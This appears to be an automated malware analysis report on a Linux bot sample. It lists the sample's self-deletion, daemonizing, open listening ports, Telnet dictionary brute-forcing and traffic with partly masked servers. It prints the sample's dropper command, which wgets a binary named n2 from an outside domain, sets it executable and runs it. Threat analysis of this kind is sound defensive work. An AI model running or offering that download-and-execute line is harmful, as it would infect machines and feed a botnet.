Technical Information
Malicious functions:
Removes itself
Launches itself as a daemon
Launches processes:
- sh -c wget http://www.1vex.cn/n2; chmod 777 *; ./n2 wget.echo.telnet.mips
- wget http://www.1vex.cn/n2
- chmod 777 n2 run.sh stdout.log
- ./n2 wget.echo.telnet.mips
Kills the following processes:
- /root/n2
Performs operations with the file system:
Modifies file access rights:
- /root/n2
- /root/run.sh
Creates or modifies files:
- /root/n2
Network activity:
Awaits incoming connections on ports:
- 0.0.0.0:23
- 0.0.0.0:1997
- 0.0.0.0:80
- 0.0.0.0:81
- 0.0.0.0:8443
- 0.0.0.0:9009
- 0.0.0.0:1943
- 0.0.0.0:1991
- 0.0.0.0:1338
- 0.0.0.0:48101
Establishes connection:
- <LOCAL_DNS_SERVER>
- 8.#.8.8:53
- 62.###.207.229:89
Attacks using a special dictionary (brute-force technique) via the Telnet protocol.
HTTP GET requests:
- ww#.#vex.cn/n2
DNS ASK:
- ww#.1vex.cn
Sends data to the following servers:
- 62.###.207.229:89
Receives data from the following servers:
- 62.###.207.229:89